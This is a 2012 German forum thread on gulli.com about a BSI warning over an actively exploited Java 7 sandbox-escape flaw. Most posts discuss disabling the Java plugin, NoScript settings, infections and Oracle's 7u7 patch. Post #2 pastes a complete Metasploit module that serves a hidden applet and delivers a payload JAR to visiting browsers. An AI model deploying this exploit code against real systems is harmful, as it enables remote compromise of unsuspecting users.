-
29. 08. 2012, 16:24 #1Chefredakteurin
gulli:Redaktion
- NewsPresso
- 164 (Virtuose)
BSI warnt vor Java-Schwachstelle
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor einer kritischen Java-Sicherheitslücke, die von Kriminellen bereits aktiv ausgenutzt wird. Einen Patch für die Lücke gibt es bislang noch nicht, so dass nur der Verzicht auf die Nutzung von Java zuverlässigen Schutz vor einer Infektion mit Schadsoftware bietet.
zur News
-
29. 08. 2012, 17:08 #2
Re: BSI warnt vor Java-Schwachstelle
hier mal ein metasploit exploit dazu:
quelle: http://packetstormsecurity.org/files...17_exec.rb.txtCode:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java 7 Applet Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Discovery 'jduck', # metasploit module 'sinn3r', # metasploit module 'juan vazquez', # metasploit module ], 'References' => [ #[ 'CVE', '' ], #[ 'OSVDB', '' ], [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ], [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ] ], 'Platform' => [ 'java', 'win', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 26 2012' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect(cli, get_resource() + '/', '') return end print_status("#{self.name} handling request") send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("Sending Applet.jar") send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head></head>" html += "<body>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end
-
29. 08. 2012, 17:09 #3Open Source Kätzchen
- NewsPresso
- 10 (Fachgröße)
-
29. 08. 2012, 17:10 #4Gesperrt
Meh, ich habs durch den Mozilla Plugin Check heute gesehen und schon deaktiviert.
-
29. 08. 2012, 19:17 #5Mitglied
NoScript.
-
29. 08. 2012, 19:24 #6
-
29. 08. 2012, 20:15 #7Neoromantic89deaktiviertes Benutzerkonto
Ich hab den Bettel schon seit Monaten deaktiviert.
-
29. 08. 2012, 20:21 #8Mitglied
Ja und genau das kann NoScript. Und der Vorteil ist, dass man nicht gleich das ganze Plugin deaktivieren/deinstallieren muss und somit eben einfacher einzelne vertrauenswürdige Applets zulassen kann.
Nur weil Java eine Schwachstelle hat bedeutet das ja nicht, dass man völlig drauf verzichten muss. Ich bezweifel jedenfalls stark, dass Applets die seit Jahren nicht mehr veraendert wurden die Schwachstelle ausnutzen, oder dass alle halbwegs seriösen Anbieter ihre Applets "nachrüsten".
Die Gefahr kommt ja hauptsächlich von Werbung, und die bleibt gesperrt oder auch durch Adblock ganz weg.
-
29. 08. 2012, 20:54 #9Mitglied
Nutzt hier jemand jdownloader und Java 7 ?
Ich nutze noch Java 6-33 weil ich von einigen Problemen zwischen JD und Java 7 gelesen habe. Das kann mitlerweile aber auch behoben sein, bei den ganzen Sicherheitsproblemen wäre ein Update von Java wohl mal nicht verkehrt. Im Browser habe ich Java schon ganz deaktiviert.
Leider läuft JD ja nicht ohne Java sonst könnte ich wohl ganz darauf verzichten.
Geändert von Nelson87 (29. 08. 2012 um 21:02 Uhr)
-
29. 08. 2012, 21:22 #10Zyniker, Wachkomatiker
Ein Schweizer Käse hat Löcher?
Is ja mal was ganz neues!
Es amüsiert mich aber dennoch, dass das BSEI davor warnt!
Nicht falsch verstehen, Warnungen sind immer gut!
-
29. 08. 2012, 21:32 #11
Mich hats gerade eben selbst erwischt. Vorhin noch den Artikel gelesen und mir gedacht, "passiert mir sowieso nicht". Nunja Daten sichern und win neu aufsetzen.
Ich empfehle es jedem das so schnell wie möglich zu deaktivieren.
-
29. 08. 2012, 22:54 #12
Wie kann ich denn bei NoScript wieder alle Seiten temporär verbieten, ohne dass meine bereits erlaubten Seiten "verschwinden"? Ich also, nach einem Java-Update dann wieder in den Normalbetrieb gehen kann und alle früher erlaubten Seiten, auch wieder erlaubt sind?
-
30. 08. 2012, 00:17 #13
aber genau das sollte man lieber machen, naehmlich java komplett zu deaktivieren.
lies doch mal das exploit dann wird dir klar das du entweder java komplett deaktivieren musst oder vor dessen ausfuehrungen das java fragen lassen musst. fuer beides brauch man kein noscript. aber weiso einfach wenns auch komplett umstaendlich geht -.-
fuer solche einstellungen brauchst du keine extra addons wie noscript oder sonstwas o.0
was das angeht betrefflich: "Die Gefahr kommt ja hauptsächlich von Werbung, und die bleibt gesperrt oder auch durch Adblock ganz weg."
sei dir da mal nich so sicher ;-)Geändert von unnex (30. 08. 2012 um 00:29 Uhr)
-
30. 08. 2012, 00:27 #14Lolkoholik Trollonist
Also wenn schon das BSI Schwachstellen in Java findet, geht es gar nicht mehr schlimmer.
-
30. 08. 2012, 08:49 #1599 Prozent
was meinst du?
nach der noscript installation ist erstmal alles gesperrt - du musst jede seite einzeln freischalten, entweder temporär oder permanent. unter "revoke temporary permissions" löschst du alle temporären ausnahmen - um einzelne einträge zu löschen, kannst du dir bei den optionen die whitelist anzeigen lassen.
blöd ist es nur, falls du deine standard-websites unter temporary eingeordnet hast ...
die "allow/forbid scripts globally" funktion fummelt nicht an der whitelist herum. betrachte die funktion einfach als "addon de-/aktivieren" (mit wenigen ausnahmen bei besch***en konfigurierten servern)
-
30. 08. 2012, 10:48 #16
Zu blöd, bin auch gerade am neu aufsetzen.
Naja hatte von den meisten Sachen zum Glück Sicherheitskopien. Werde dann wohl auch nur noch java script auf vertrauenswürdigen Seiten aktivieren.
-
30. 08. 2012, 16:52 #17
Gibt's einen Test, mit dem ich überprüfen kann, ob ich infiziert bin?
Und zu NoScript: Ich suche eigtl. nur das Pendant zu "Skripte allgemein erlauben (nicht empfohlen)". Ich will nicht meine gesamte Whitelist löschen müssen. Also nur ein Möglichkeit alle Seiten temporär zu verbieten.Geändert von traceroute (30. 08. 2012 um 17:01 Uhr)
-
30. 08. 2012, 18:23 #18Mitglied
Auf java.com gibt es jetzt die Version 7 Update 7, scheinbar hat man jetzt reagiert.
-
30. 08. 2012, 18:36 #19Mitglied
Beim Ausführen von JD werden doch gar keine fremden Java-Dateien ausgeführt. Wozu solltest du dann auf Java verzichten wollen?
Wenn du den Entwicklern eines Programms nicht vertraust, solltest du das Programm gar nicht benutzen. Unabhängig davon, ob es unter Java läuft oder aber in einer anderen Sprache programmiert wurde.
Hauptsächlich geht es hier um Java-Applets, die über das Java-Plugin ausgeführt werden.
Wieso wieder temporär verbieten? In der Standardeinstellung wird doch alles verboten, was nicht ausdrücklich per Whitelist erlaubt wird?Wie kann ich denn bei NoScript wieder alle Seiten temporär verbieten, ohne dass meine bereits erlaubten Seiten "verschwinden"?
Ja und? Wenn schon müsste das Java-Plugin deaktiviert werden. Muss man aber nicht, da man mit Noscript die Ausführung von Java-Applets unterbinden kann - wahlweise aber auch relativ einfach zulassen kann.aber genau das sollte man lieber machen, naehmlich java komplett zu deaktivieren.
Das dürfte für die meisten User, speziell die, die Noscript bereits benutzen, wesentlich praktikabler sein.
-
30. 08. 2012, 22:38 #20
das 7u7 update ist raus welches diese Sicherheitslücke schließt.
Aber schon peinlich, Oracle ist diese schwere Lücke schon seit APRIL bekannt.
-

mehr lesen...

Julian Assange fürchtet geheimen...
Heute, 02:05 in gulli:news